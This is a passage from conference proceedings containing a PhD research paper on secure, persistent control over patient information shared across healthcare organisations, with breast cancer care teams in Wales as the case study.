Education, Society for Advancing Information Assurance and Infrastructure Protection, Washington, D.C.,<br />

June 3-5, 2003.<br />

Zlateva, T.; J. Burstein: "A Web-Based Graduate Certificate for IT Professionals - Design Choices and First<br />

Evaluation Results". Proceedings of the 2001 Annual <strong>Conference</strong> of the American Society for Engineering<br />

Education(ASEE), June 24-27, Albuquerque, New Mexico. http://soa.asee.org/paper/conference/paperview.cfm?id=16617<br />

276


PhD<br />

Research<br />

Papers<br />

277


Towards Persistent Control over Shared Information in a<br />

Collaborative Environment<br />

Shada Alsalamah, Alex Gray and Jeremy Hilton<br />

Cardiff University, UK<br />

S.A.Salamah@cs.cardiff.ac.uk<br />

W.A.Gray@cs.cardiff.ac.uk<br />

Jeremy.hilton@cs.cardiff.ac.uk<br />

Abstract: In a complex collaborative environment, such as healthcare, where Multi-Disciplinary care Team<br />

(MDT) members and information come from independent organisational domains, there is a need for informationsharing<br />

across the organizations’ information systems in order to achieve the overall goal of collaboration.<br />

Inability to provide a secure communication method, giving local/global protection is affecting inter-professional<br />

communications and hindering sharing among MDT members. This research aims to facilitate a secure<br />

collaborative environment enabling persistent control over shared information across boundaries of the<br />

organisations that own the data. This paper is based on the early stages of the research and its results will feed<br />

into following stages. It looks at the structure of a healthcare system to understand the types of inter-professional<br />

communication and information exchange that occur in practice. Additionally it presents an initial assessment<br />

identifying the Information Security (IS) needs and challenges faced in providing persistent control in a shared<br />

collaborative environment by using conceptual modelling of a selected medical scenario (breast cancer in<br />

Wales). The results show that a considerable number of professionals are involved in a patient’s treatment. Each<br />

plays a well-defined role, but often uses different Healthcare Information Systems (HIS) to store sensitive and<br />

confidential patient medical information. These HIS cannot provide secure multi-organisational informationsharing<br />

to support collaboration among the MDT members. This causes inter-professional communication issues<br />

among team members that inhibit decision-making using the information. The findings from this study show how<br />

to improve information support from HIS stored information for MDT members. Also the resulting IS functions will<br />

be described which facilitate establishing secure collaborative environments guaranteeing persistent control over<br />

shared information.<br />

Keywords: information security, information system, Information sharing, multi-disciplinary team, persistent<br />

control, secure collaborative environment<br />

1. Introduction<br />

Current innovation in Information and Communication Technology (ICT) has encouraged collaboration<br />

within and among different fields, including healthcare. This has introduced novel inventions or<br />

tackled large-scale scientific problems. Such collaboration often demands extensive sharing of<br />

different resources among collaborating organisations in order to achieve an overall goal (Park and<br />

Sandhu, 2002; Wasson and Humphrey, 2003; Yau and Chen, 2008). Such collaboration may involve<br />

information in distributed resources being used and shared by users from geographically and<br />

administratively distributed physical organisations that own the resources. On all sites, these<br />

collaborations form Virtual Organisations (VOs) (Wasson and Humphrey, 2003; Yau and Chen, 2008).<br />

Therefore, a key characteristic of a VO is that users and information may come from different<br />

organisations, and thus various administrative domains (Thompson et al., 2003) with each applying<br />

local Information Security (IS) rules to protect its own information. As a result, when these<br />

organisations come together in a VO, they demand a Secure Collaborative Environment (SCE) for<br />

sharing resources, mainly information and data. However, there are three possible levels of protection<br />

when user(a) in domain(a) needs to share information with user(b) in domain(b) outside its secured<br />

administrative domain(a).<br />

Level 1 is local to domain(a) - user(a) loses control over the information once it is shared as the<br />

protection level applied inside domain(a) using IS rules(a) is not guaranteed outside this domain<br />

(once it has passed to domain(b) where IS rules(a) are not applied).<br />

Level 2 allows user(a) to have static control over the shared information when its protection is<br />

assured by user(b) using IS rules(b) when inside domain(b). (Here user(a) passes control to<br />

user(b), and although the information will still be protected, the rules applied change once the<br />

information is received, since user(a) has no control over domain(b)’s protection authority. Thus if<br />

the protection level of original information changes in domain(a), there is no guarantee that<br />

user(b) will also change it on the shared version of this information in domain(b). Additionally, if<br />

user(b) changes the protection on the shared version, user(a) cannot retain control).<br />

278


Shada Alsalamah et al.<br />

Level 3 allows dynamic control. It enables persistent control over information anywhere outside<br />

domain(a), including domain(b), using the rules(a) by communicating rules(a) along with the<br />

shared information. Furthermore, persistent control, in this context, enables synchronisation of<br />

any changes made regarding the protection level of the original information in domain(a) with the<br />

shared version of the information in domain(b). This guarantees full control of user(a) at all times<br />

by sustaining the original information protection level outside its domain, making it remotely<br />

editable. In this context, only the final protection level creates an SCE in a VO, therefore, a<br />

collaborative environment, with multiple independent domains, is referred to as an SCE, when<br />

each domain has persistent control over its shared information.<br />

Based on this, we can differentiate between level 2 and 3, in that the dynamic control creates an SCE,<br />

whereas the static control does not. This is because the latter leaves the information out of both<br />

users’ control at the point when it leaves domain(a) and before being received at domain(b), although<br />

it is secured otherwise.<br />

In fact, static and dynamic levels of information protection could suit different scenarios based on the<br />

information protection level required. This paper explores the need for SCEs in VOs and the<br />

challenges in implementing this environment by investigating a representative example of a VO,<br />

namely the healthcare scenario. This paper is based on a study-case scenario carried out in this<br />

naturally complex environment where healthcare professionals from different organisations critically<br />

need to collaborate and have control over exchanged medical information when treating a patient with<br />

breast cancer in Wales, UK. The paper is now divided into five main sections, which cover the<br />

problem statement, method for understanding the problem, results, a discussion of the results and<br />

conclusion.<br />

2. Problem statement<br />

In this scenario, the patient treatment delivery model is shifting from a disease-centric approach<br />

towards one that is patient-centric (Allam, 2006; Al-Salamah et al., 2009), and considers the patient’s<br />

medical condition as a whole rather than by managing patients as having separate diagnosed<br />

diseases, each treated by different professionals (Department of Health, 1997; Pirnejad, 2008; Al-<br />

Salamah et al., 2009). In a patient-centric approach, the patient is the central focus and is treated by a<br />

Multi-Disciplinary care Team (MDT) (Allam, 2006; Al-Salamah et al., 2009). This team consists of<br />

different healthcare professionals coming from different healthcare organisations to form a VO for<br />

patient treatment. This MDT, and hence the VO, evolves over time in response to the patient’s<br />

changing medical condition. In addition, in order to organise the MDT work and assist the delivery of<br />

patient treatment, a visual and structured care plan, called an Integrated Care Pathway (ICP), is<br />

followed. This plan reflects an ideal, evidence-based patient treatment journey for the condition<br />

(Zander, 2002; Al-Salamah et al., 2009; Map of Medicine, 2010e). In the UK, ICPs are based on<br />

having regular MDT meetings to discuss the patient’s case and provide recommendations for the<br />

treatment management plan. This new approach is increasing the need for sharing medical<br />

information among MDT members as they work together on treating the patient. Consequently, this<br />

will possibly require the information to leave the systems where each member stores patient<br />

information (Smith and Eloff, 1999; Thompson et al., 2003; Beale, 2004; Pirnejad, 2008). The<br />

distributed nature of this collaboration demands an effective SCE, that facilitates secure interprofessional<br />

communication among members, to exchange often-sensitive information.<br />

HISs currently used in patient treatment are hindering inter-professional communication among MDT<br />

members in the health environment. The literature shows that healthcare is suffering from poor interprofessional<br />

communication (Pirnejad, 2008) and this is a key factor contributing to medical errors<br />

(Mohyuddin et al., 2008; Al-Salamah et al., 2009). Indeed, research estimates an annual figure of<br />

850,000 medical errors occurring in NHS hospitals (Department of Health, 2000). These can lead to<br />

death, life-threatening illness, disability, admission to hospital, or prolongation of a hospital stay, as<br />

well as inevitable complications in treatment in some cases which might have been avoided in most<br />

cases if the patient had received ordinary standards of care (Department of Health, 2000; Aylin et al.,<br />

2004). Furthermore, the NHS spends around £400 million annually in settlement of clinical negligence<br />

claims, and has a potential liability of around £2.4 billion for existing and expected claims (Department<br />

of Health, 2000). However, a prime reason behind communication issues and medical errors in the<br />

healthcare environment is the limitation of HIS and ICT used in patient treatment (Smith and Eloff,<br />

1999; Commission for Health Improvement and Audit Commission, 2001; Anderson, 2008;<br />

Mohyuddin et al., 2008; Pirnejad, 2008; Al-Salamah et al., 2009; Skilton et al., 2009). These cause<br />

problems in data processing and representation, the amount of information they are capable of<br />

279


Shada Alsalamah et al.<br />

providing (Mohyuddin et al., 2008), and in communication at departmental, organisational, and even<br />

national levels (Al-Salamah et al., 2009). This is because some of these HISs were designed over 50<br />

years ago (Department of Health, 1997) and thus were tailored to meet the requirements of the<br />

disease-centric approach prevailing at that time (Al-Salamah et al., 2009; Skilton et al., 2009).<br />

Although legacy systems may be capable of providing local and static protection, in the new patientfocused<br />

approach, they hinder communication and information-sharing since protection is not<br />

guaranteed outside secured domains. As a result, information is only accessible within secured<br />

domains where such HISs exist (Lillian, 2009) and the only method of sharing is verbally or by printing<br />

on paper for posting. In addition, despite the fact that ICT is used in some healthcare organisations to<br />

improve communication, in practice, the results did not meet expectations, because either the HIS<br />

failed to be implemented in the healthcare environment or could not achieve implementation<br />

objectives (Commission for Health Improvement and Audit Commission, 2001; Pirnejad, 2008).<br />

Finally, according to Anderson (2008: 3-11), although the security requirements of these systems vary<br />

in terms of the collection of authentication, transaction integrity and accountability, message secrecy,<br />

and covertness they use, many fail because system designers protect either the wrong information, or<br />

the right information but in the wrong way. See reported incidents and concerns in (Blackhurst, 2010;<br />

NursingTimes, 2010a; NursingTimes, 2010b; Sturcke and Campbell, 2010).<br />

Nevertheless, implementation of the new patient-centric approach demands an SCE. The HIS is not<br />

like any other information system because of the “patient” entity. It holds extensive information<br />

combining patient’s biological details and social complexity (Beale, 2004). This information may<br />

contain personal (Office of Public Sector Information, 1998; Department of Health, 2003),<br />

embarrassing (Sturcke and Campbell, 2010), and critical medical information (National Institute for<br />

Healthcare and Clinical Excellence, 2002; Beale, 2004; Meystre, 2007). The nature of a customer or<br />

traveller’s information stored in a bank or airline system decays with age and normally once this<br />

information is published or exposed, protection is no longer required. Patient information, on the other<br />

hand, has a longevity characteristic (Beale, 2004) that will always render it highly sensitive (Smith and<br />

Eloff, 1999) and confidential (Department of Health, 2003); indeed, it is the type of information that will<br />

never expire even after the patient’s death. It is therefore critical to have constant protection with<br />

persistent control and the assurance that it will only be disclosed to the right person for permitted<br />

medical purposes (Department of Health, 2003). Since legacy HISs are not designed to achieve this,<br />

an SCE is essential to help members of MDTs share this information securely with persistent control.<br />

Most of the existing solutions attempt to protect information as long as it exists within the secured<br />

domain and when this information is shared across boundaries, it is no longer secured or controlled<br />

(Park and Sandhu, 2002; Burnap and Hilton, 2009; Nene and Swanson, 2009). Further examples are<br />

in (Chadwick, 2002; Alfieri, 2003). Furthermore, although several solutions are able to protect<br />

electronic information across domains such as Digital Rights Management and Usage Control (Park<br />

and Sandhu, 2002), they are either constrained by the number of uses and/or users (Nene and<br />

Swanson, 2009) or the control policy associated with the content cannot be modified by the<br />

information owner once disseminated (Thompson, et al., 2003). In fact, this is a vital issue that would<br />

prevent adapting to the dynamic nature of the VO environment, such as healthcare, where the need<br />

to protect the information is as important as the need for sharing it. For example, when members of<br />

the VO change their roles or one of the participating organizations goes out of existence, there will be<br />

a need to deny access to information previously shared (Burnap and Hilton, 2009). Therefore, these<br />

solutions are restricted and incapable of providing full protection with the flexibility of persistent<br />

control.<br />

However, enabling information-sharing across organisations with persistent control raises a number of<br />

IS issues and challenges that limit the effectiveness, dynamism, and potential of this collaborative<br />

working (Beale, 2004; Burnap and Hilton, 2009). Firstly, MDT members and information resources<br />

come from different organisations and administrative domains (Thompson et al., 2003). Although<br />

organisations adopt national good-practice guidelines and IS policies to protect in-house medical<br />

information, they adapt them to fit local needs and circumstances (Cancer Services Expert Group,<br />

2008). In other words, MDT members and the systems they use do not speak the same IS language<br />

either at the human or machine level. This makes interoperability difficult since there are no clear and<br />

precise IS policies and practice guidelines at a national level governing a VO-wide exchange of<br />

information. This may result in direct conflicts in terms of information access requirements between<br />

software applications of multiple vendors in use (Beale, 2004). Consequently, negotiating VO-wide<br />

agreements across organisations is often a lengthy and complex process (Thompson et al., 2003).<br />

Secondly, the collaboration demands extensive information-sharing among MDT members in order to<br />

280


Shada Alsalamah et al.<br />

assure the availability of relevant information in a continually changing scene. However, sharing<br />

sensitive information requires a focus on the person’s role in the treatment process, since different<br />

roles have different information requirements. This necessitates a careful balance between the<br />

availability of life-critical data and confidentiality of patient information so that it supports prompt<br />

reliable care without privacy violation. According to Beale (2004) and Anderson (2008: 3-11), these<br />

two requirements are in direct conflict, which make it hard to achieve, even using the current<br />

traditional computer security mechanisms. Thirdly, the human side in the collaborative environment<br />

increases the complexity. In each organisation, professionals and other employees involved with the<br />

management, use, or operation of the resources within the domain are normally mandated to attend<br />

annual organisation-wide IS training sessions to inform personnel of IS risks associated with their<br />

activities and their responsibilities in complying with organisation policies and procedures designed to<br />

reduce such risk, as well as, to manage resources and protect information. However, the absence of<br />

a VO-wide IS awareness means MDT members are unaware of the overall required IS needs of all<br />

involved organisations, and their responsibility to ensure information received from different<br />

organisations is protected and that its use is fit for purpose in the treatment. Fourthly, relevant medical<br />

information should be available across organisations seamlessly (Yau and Chen, 2008). Finally, there<br />

are additional existing technical, economic, political, ethical and logistical information ownership<br />

issues and barriers that hinder sharing across organisations (Smith and Eloff, 1999; Mandl et al.,<br />

2001; Beale, 2004; Cross, 2006).<br />

This research aims to address some of these issues and challenges by defining and implementing an<br />

approach that would help provide a SCE with persistent control. This should provide seamless remote<br />

access to information, that reflects the changing role of MDT members, as the treatment progresses<br />

along the ICP and provides only relevant information to the team members based on their current role<br />

in the treatment process. In addition, it should offer a common user-friendly set of IS rules to be used<br />

by MDT members from all involved organisations. These rules should be embedded in the information<br />

being shared in order to sustain the rules as defined by the information owner. Finally, having<br />

common IS rules will ease raising MDT members awareness of their responsibilities towards the<br />

protection of exchanged information. This will need to be developed in different research stages,<br />

starting with an understanding of the healthcare system and the information exchanges occurring in<br />

practice, to the investigation of the current information systems’ issues and MDT IS needs for the<br />

collaboration, and ending with a solution that would facilitate this secure sharing of information with<br />

persistent control.<br />

3. Method<br />

We believe it is important to gain an understanding of the inter-professional communication and<br />

information exchange in practice through the study of a real-life scenario. The breast cancer scenario<br />

in Wales was selected as a healthcare system whose structure would be examined to understand:<br />

how MDT members communicate; how HISs are used by the MDT to achieve the overall treatment<br />

goal; how the information is generated and stored; and how it can be used to support collaboration. In<br />

addition, it will allow an initial assessment that will help identify the IS needs for the SCE with<br />

persistent control.<br />

Our reference scenario’s conceptual model is the ICP treatment journey for breast cancer treatment in<br />

Wales. It is divided into six parts (Map of Medicine, 2010a; Map of Medicine, 2010b; Map of Medicine,<br />

2010c; Map of Medicine, 2010d; Map of Medicine, 2010g; Map of Medicine, 2010h), which are taken<br />

from the Map of Medicine (2010i, 2010f, 2010e) and so follow its recommended ICP for this disease.<br />

Using conceptual modelling, we investigated the different healthcare professionals involved in the<br />

treatment of patients, as they carried out their tasks defined by their roles in the six parts of the ICP,<br />

the different HISs used to serve the patient’s treatment at each step, the medical information<br />

generated and stored in these HISs for each task, the IS policies applied, and the inter-professional<br />

communication between the MDT members. Part of the conceptual model that was derived from the<br />

breast cancer ICP (Map of Medicine, 2010h) is shown in Figure1.<br />

281


Shada Alsalamah et al.<br />

Figure 1: Part of breast cancer treatment conceptual model<br />

4. Results<br />

Although the investigation is still under way, the following results have been found.<br />

First, according to the National Institute for Healthcare and Clinical Excellence (NICE) (2002), breast<br />

cancer diagnosis and treatment is a co-operative activity that involves a range of professionals, both<br />

within and outside the breast cancer unit. We found that there are at least 16 healthcare professionals<br />

involved in the treatment of a patient in this process in Wales. Although each plays a well-defined but<br />

different role, they are increasingly working in teams (Commission for Health Improvement and Audit<br />

Commission, 2001). Annually, each MDT diagnoses and treats 100 new breast cancer patients<br />

(NICE, 2002). The provision of a high quality service requires close co-operation between specialists<br />

from several disciplines and it is essential that care is provided by a breast cancer MDT in a specialist<br />

breast unit (Cancer Services Expert Group, 2008). In addition, there are at least two professionals for<br />

each role in the core breast care team (NICE, 2002). The different MDT members’ roles can be<br />

categorised into three different groups:<br />

Primary care personnel: GP, district nurse, and practice nurse.<br />

Principal specialist personnel (core breast cancer team): breast cancer nurse specialists, clinical<br />

and medical oncologists, radiologists, pathologists, and surgeons.<br />

Affiliated personnel: liaison psychiatrist and/or clinical psychologist, palliative care specialists and<br />

teams, physiotherapists and occupational therapists, surgeons experienced in breast<br />

reconstruction, clinical genetics, pharmacists, and haematologists.<br />

Second, there are at least seven HISs holding information about the patient with each having its own<br />

patient health record. This record stores sensitive and confidential personal and medical information.<br />

Although the HISs collectively adopt and adapt national guidelines, each applies its own and different<br />

policies and guidelines locally. These meet local needs and circumstances (Cancer Services Expert<br />

Group, 2008). The seven HISs found in this scenario and the different types of medical records they<br />

might contain are listed in Table1 in appendix A.<br />

Finally, a crucial feature of the breast cancer MDT is its composition, the way it works, and the<br />

coordinated care it offers. This team functions in the context of a cancer unit or centre, which may<br />

consist of one or more sites using shared facilities (NICE, 2002). NICE (2002) and the Commission<br />

282


Shada Alsalamah et al.<br />

for Health Improvement and Audit Commission (CHIAC) (2001) revealed audit and anecdotal<br />

evidence of problems in inter-professional communication and a failure to plan care in a systematic<br />

way between the different professionals involved. Such problems have been linked with complaints<br />

and litigation (NICE, 2002). For example, GPs sometimes lose track of patients during the treatment<br />

period or become unable to discuss the diagnosis and prognosis with patients due to lack of<br />

information from consultants. Furthermore, primary personnel can be unaware that a patient has been<br />

discharged, sometimes without necessary services or equipment being arranged. It can be unclear<br />

whether the GP or consultant is responsible for patient follow-up after treatment. Furthermore, the<br />

HISs are poor in their support of day to day working arrangements, including communication,<br />

appointment systems and shared protocols (CHIAC, 2001). Indeed, even if the care team is ready to<br />

share medical information (CHIAC, 2001), the current HISs are not supporting this sharing of<br />

information (CHIAC, 2001; Skilton et al., 2009). Finally, although many trusts do not have agreed<br />

policies for the management of cancers, where policies do exist, it is unclear whether they are<br />

followed because practice is not audited (CHIAC, 2001). Furthermore, formal policies and plans<br />

cannot ensure that services are provided in a patient-centred way, without a change in the attitudes<br />

and behaviour of those working with patients (CHIAC, 2001).<br />

5. Discussion and future work<br />

These results identify the different roles of MDT members involved in the treatment of patients with<br />

breast cancer in Wales, the HISs involved, the types of health records created in these systems, and<br />

medical information stored in these different records. This information helped the development of an<br />

understanding of the emerging need for the SCE for MDT members involved in treating patients with<br />

breast cancer. For example, some of the tasks carried out as the patient proceeds through the breast<br />

cancer’s ICP show a clear redundancy in some of the information collected, including, but not limited<br />

to, a clinical assessment and patient history check. It can save time and resources if this information<br />

was available for the healthcare professional in charge at the point of treatment. In addition, data<br />

redundancy can cause data inconsistency issues and having a single shared data record (i.e. patient<br />

history) guarantees the availability of up-to-date information for all MDT members. Another example is<br />

that GPs should support patients undergoing diagnosis, treatment and follow-up leading either to cure<br />

or to eventual death. This means GPs should follow patients from the very start of the ICP. Although<br />

patients may start their ICP at different stages, the GP should have direct contact with other breast<br />

cancer MDT members treating the patient in order to be informed about all of the patient’s current<br />

relevant medical information at all times. This would enable effective consultation and follow-up. In<br />

addition, there can be different professionals playing the same role and also one professional playing<br />

different roles. Furthermore, privacy violations can be expected if all of the members can see every<br />

patient’s records (Anderson, 2008). This emphasises the need for effective SCE with systems that<br />

can ensure the availability of life-critical information about the patient’s medical condition based on the<br />

professional’s role at the time of treatment. Also, the breast cancer MDT checks 100 patients<br />

annually. Each of these patients will be following different directions in the same ICP, and in some<br />

cases, following multiple ICPs as well, if the patient suffers from more than one disease. This will be<br />

difficult to manage without the support of an HIS that considers the patient condition as a whole.<br />

Therefore, good inter-professional communication is essential to co-ordinate the activities of all those<br />

involved, and ensure effective communication between professionals working in the primary,<br />

secondary and tertiary sectors of care. For that reason, the breast care MDT must develop and<br />

implement systems that ensure rapid and effective communication between all healthcare<br />

professionals involved in each patient’s treatment management. This would facilitate the provision of<br />

adequate means for communicating information on referral, diagnosis and treatment, follow-up, and<br />

supportive/palliative care throughout the stages of the ICP.<br />

The HISs identified in this research can be studied to identify the IS issues in these systems that<br />

hinder inter-professional communication. This can be achieved by investigating the IS rules applied in<br />

these HISs to protect medical information. This is an important step to take before speaking to all<br />

involved parties in order to know their IS needs to facilitate the SCE with others involved in the<br />

treatment. This can help identify and define the best way to have persistent control over the<br />

information accessed in a distributed environment when it will be moved outside the HIS’s locally<br />

controlled environment. This can be achieved either by agreeing on a set of common rules for all<br />

involved HISs to apply in a neutral administrative domain used for the sharing process, or by<br />

changing the way they work internally by standardising the IS rules. It may be that sharing in either of<br />

these ways is not possible at this point in time. The main aim of this research at the moment is to<br />

facilitate an SCE that can support collaboration among MDT members while guaranteeing persistent<br />

283


Shada Alsalamah et al.<br />

control over shared patient medical information in the future. This would be hard to achieve without<br />

the identification of the IS issues and emerging needs in this dynamic environment through the study<br />

of a real-life scenario.<br />

6. Conclusion<br />

There is a shift today towards collaboration among different healthcare organisations for a common<br />

goal of better patient treatment through moving to a patient centric control. In achieving this, an IS is<br />

essential to the effectiveness, dynamism, and potential of collaborative working if the full potential is<br />

to be realised. The provision of an SCE for multiple organisations has proved to be a challenge. This<br />

paper presents the results of a study into the inter-professional communication needs of a secure<br />

cross organisation’s information-sharing system in the healthcare domain. The findings in this paper<br />

provide the initial results from the first stage of the project and they will be used to inform further<br />

investigation in the ensuing stages to identify the key IS issues affecting inter-professional<br />

communication, as well as the IS needs in this environment which facilitate the sharing of information<br />

throughout the distributed domain.<br />

7. Appendix A<br />

The following table contains redundancy due to the information type appearing in more than one<br />

record type. This is indicated by [-] with numbers inside were the number refers to the other HIS<br />

record type containing this information. This redundancy has two causes, either the information is<br />

copied from another record to this system in which case the original should be the accurate<br />

information, or it can be due to separate readings being taken and the results being stored in these<br />

different systems. All records hold administrative/demographic data for each patient and Table 1 only<br />

lists non-administrative information.<br />

Table 1: HISs used in treating patients with breast cancer in Wales, UK<br />

HIS Health Record Type Information Stored<br />

1. GP-System GP-records Clinical presentation report<br />

Clinical assessment report<br />

Clinical history report-[2]<br />

Physical examination report-[2]<br />

Filled referral form (include patient details, referring doctor<br />

details, medical context, and referral information)-[2]<br />

Information about referred patients’ diagnosis (by the end of<br />

Triple Assessment path way)-[2]<br />

MDT recommendations and treatment plans-[2,6,7]<br />

Given treatment plan-[2]<br />

Given medication-[2]<br />

Follow-up plan-[2]<br />

2. Secondary-<br />

Care-System<br />

Follow-up visits report-[2]<br />

Secondary-care-records Referral form-[1]<br />

Clinical history report-[1]<br />

Clinical examination code-[1]<br />

Tests requests (e.g. blood, ultrasound, X-ray test)-[3,4]<br />

Blood test results report-[3]<br />

X-ray and Ultrasound results report-[4]<br />

Pathologists reports-[5]<br />

Radiologists and oncologists results reports-[6]<br />

Surgeons reports-[7]<br />

General patient case notes including: (BC diagnostic, staging,<br />

pathology information, histology reports, and tests’ result<br />

reports)-[1,3,4,5,6,7]<br />

General information addressing the patient’s specific situation<br />

(in leaflets, audio or video CDs format)<br />

MDT recommendations and treatment plans-[1,6,7]<br />

Given treatment plan<br />

Follow-up plan<br />

Follow-up visits report<br />

284


3. Hematology<br />

Laboratory<br />

System<br />

Whole Blood samples (for<br />

FBC)<br />

Blood for grouping, antibody<br />

screening and saving and/or<br />

cross-matching<br />

Request forms for grouping,<br />

antibody screening and crossmatching<br />

Results of grouping, antibody<br />

screening and cross-matching<br />

Lab file cards/working records<br />

of test results<br />

Shada Alsalamah et al.<br />

Tests requests-[2]<br />

General patient case notes-[1,2,4,5,6,7]<br />

Blood test results report<br />

FBC report<br />

Renal and liver function test report<br />

Blood Calcium test report<br />

HIS Health Record Type Information Stored<br />

4. X-ray-System X-ray films records<br />

X-ray reports (including<br />

reports for all imaging<br />

modalities)<br />

Breast screening X-rays<br />

records<br />

Ultrasound records<br />

5. Pathology-<br />

Laboratory-<br />

System<br />

6. Oncologysystem<br />

7. Surgicalsystem<br />

References<br />

Pathology records<br />

Human tissue<br />

Lab file cards/ working<br />

records of test results<br />

Oncology records<br />

Radiation dose records for<br />

classified persons<br />

Operating theatre registers<br />

Surgical records<br />

Test requests-[2]<br />

General patient case notes-[1,2,3,5,6,7]<br />

Mammography report<br />

X-ray images<br />

Ultrasound report<br />

Ultrasound images<br />

MRI report<br />

MRI images<br />

Isotope bone scan<br />

CT report and CXR image<br />

Abdomen ultrasound image<br />

Echocardiogram scan report and scan image<br />

DEXA scanning report and image<br />

Administrative information/ Demographic data-[1,2,3,4,6,7]<br />

Test requests from Oncologist-[6]<br />

General patient case notes-[1,2,3,4,6,7]<br />

Biopsy report with diagnosing code<br />

FNA report with diagnosing code<br />

Tissue samples<br />

The cancer tumour size, nodes, metastasis (TNM) staging<br />

code<br />

Tumour grade<br />

Histology report with biopsy diagnosing code<br />

Test requests-[2]<br />

General patient case notes-[1,2,3,4,5,7]<br />

MDT recommendations and treatment plan-[1,2,7]<br />

Test requests to Pathologist<br />

Cancer TNM staging code-[5]<br />

Tumour grade-[5]<br />

Neo-adjuvant endocrine therapy report<br />

Neo-adjuvant chemotherapy therapy report<br />

Chemotherapy drugs list and dose<br />

Radiotherapy report<br />

Adjuvant chemotherapy report (include the risk analysis)<br />

Hormonal therapy report<br />

Endocrine therapy report<br />

Bisphosphonates report<br />

Surgical report<br />

General patient case notes-[1,2,3,4,5,6]<br />

MDT recommendations and treatment plans-[1,2,6]<br />

Al-Salamah, H., Gray, A., Allam, O. and Morrey, D., (2009). Change Management along the Integrated Care<br />

Pathway. In: the 14th International Symposium on Health Information Management Research. Bath P,<br />

Petersson G, AND Steinschaden T editors. Kalmar, Sweden. pp. 53- 66.<br />

Alfieri, R. et al., (2003). VOMS, an Authorization System for Virtual Organizations. In: the 1st <strong>European</strong> Across<br />

Grids <strong>Conference</strong>. Santiago de Compostela. pp. 33-40.<br />

Allam, O., (2006). A Holistic Analysis Approach to Facilitating Communication between General Practitioners and<br />

Cancer Care Teams. Thesis. Department of Computer Science & Informatics. Cardiff University. Cardiff. pp.<br />

182.<br />

Anderson, R. J., (2008). Security Engineering 2nd ed. Indianapolis: Wiley Publishing.<br />

285


Shada Alsalamah et al.<br />

Aylin, P., Tanna, S., Bottle, A. and Jarman, B., (2004). How often are adverse events reported in English hospital<br />

statistics? BMJ, 329, (7462) 369.<br />

Beale, T., (2004). The Health Record - Why is it so hard? IMIA Yearbook of Medical Informatics 2005. Ubiquitous<br />

Health Care Systems. Haux R, Kulikowski C, editors. Stutt-gart: Schattauer. pp. 301-304.<br />

Burnap, P. and J. Hilton., (2009). Self Protecting Data for De-perimeterised Information Sharing. In: The Third<br />

International <strong>Conference</strong> on Digital Society, ICDS '09. Cancun, Mexico. pp. 65-70.<br />

Blackhurst, D., (2010). GPs fear breach of secret patient data, [online]. Available from:<br />

http://www.thisisstaffordshire.co.uk/news/GPs-fear-breach-secret-patient-data/article-772149detail/article.html<br />

[Accessed: 02 November 2010].<br />

Cancer Services Expert Group, (2008). Breast Cancer Task Group Report, The Cameron report, Cardiff: NHS<br />

Wales.<br />

Chadwick, D. W. and Otenko, A., (2002). The PERMIS X.509 role based privilege management infrastructure. In:<br />

Proceedings of the seventh ACM symposium on Access control models and technologies. Monterey,<br />

California, USA: ACM.<br />

Commission for Health Improvement and Audit Commission (CHIAC), (2001). National Service Framework<br />

Assessments No. 1: NHS Cancer Care in England and Wales. London: Commission for Health<br />

Improvement.<br />

Cross, M., (2010). Patients, not the state, own medical records, says GP, [online]. Guardian online. Available<br />

from: http://www.guardian.co.uk/technology/2006/jul/06/epublic.guardianweeklytechnologysection<br />

[Accessed: 01 March 2010].<br />

Department of Health, (1997). The new NHS: modern, dependable. London: HMSO.<br />

Department of Health, (2000). An organisation with a memory. London: HMSO.<br />

Department of Health, (2003). Confidentiality: NHS Code of Practice. London: HMSO.<br />

Department of Health, (2006). Records management: NHS code of practice. London: HMSO.<br />

Mandl, K. D.et al., (2001). Public standards and patients' control: how to keep electronic medical records<br />

accessible but private Commentary: Open approaches to electronic patient records Commentary: A<br />

patient's viewpoint. BMJ, 322, (7281) 283- 287.<br />

Map of Medicine, (2010a). Breast cancer - advanced, [online]. Available from:<br />

http://healthguides.mapofmedicine.com/choices/map/breast_cancer6.html [Accessed: 12 January 2010].<br />

Map of Medicine, (2010b). Breast cancer - local recurrence, [online]. Available from:<br />

http://healthguides.mapofmedicine.com/choices/map/breast_cancer5.html [Accessed: 12 January 2010].<br />

Map of Medicine, (2010c). Breast Cancer- suspected, [online]. Available from:<br />

http://healthguides.mapofmedicine.com/choices/map/breast_cancer1.html [Accessed: 12 January 2010].<br />

Map of Medicine, (2010d). Initial multidisciplinary team (MDT) review, [online]. Available from:<br />

http://healthguides.mapofmedicine.com/choices/map/breast_cancer3.html [Accessed: 12 January 2010].<br />

Map of Medicine, (2010e). Map of Medicine, [online]. Available from: http://mapofmedicine.com/ [Accessed: 12<br />

January 2010].<br />

Map of Medicine, (2010f). Map of Medicine Healthguides, [online]. Available from:<br />

http://www.mapofmedicine.com/solution/patientaccess/ [Accessed: 12 January 2010].<br />

Map of Medicine, (2010g). Postsurgical multidisciplinary team (MDT) review, [online]. Available from:<br />

http://healthguides.mapofmedicine.com/choices/map/breast_cancer4.html [Accessed: 12 January 2010].<br />

Map of Medicine, (2010h). Secondary care - triple assessment clinic, [online]. Available from:<br />

http://healthguides.mapofmedicine.com/choices/map/breast_cancer2.html [Accessed: 12 January 2010].<br />

Map of Medicine, (2010i). See what your doctor can see with Map of Medicine Healthguides, [online]. Available<br />

from: http://healthguides.mapofmedicine.com/choices/map/index.html [Accessed: 12 January 2010].<br />

Meystre, S., (2007). Electronic Patient Records: Some Answers to the Data Representation and Reuse<br />

Challenges. IMIA Yearbook 2007: Biomedical Informatics for Sustainable Health Systems, (1) 47- 48.<br />

Mohyuddin, Gray, W. A. et al., (2008). Wireless Patient Information Provision and Sharing at the Point of Care<br />

using a Virtual Organization Framework in Clinical Work. In: sixth Annual IEEE International <strong>Conference</strong> on<br />

Pervasive Computing and Communications. IEEE Computer Society. pp. 710 - 714.<br />

Nene, B. and Swanson, T., (2009). Information Rights Management Application Patterns, report: Microsoft<br />

Corporation.<br />

National Institute for Healthcare and Clinical Excellence (NICE), (2002). Improving Outcomes in Breast Cancer -<br />

Manual Update, report, London.<br />

Nursingtimes, (2010a). Data protection warning as more trusts lose patient records, [online]. Available from:<br />

http://www.nursingtimes.net/whats-new-in-nursing/acute-care/data-protection-warning-as-more-trusts-losepatient-records/5004097.article<br />

[Accessed: 01 June 2010].<br />

Nursingtimes, (2010b). Loss of patient details prompts warning for five trusts, [online]. Available from:<br />

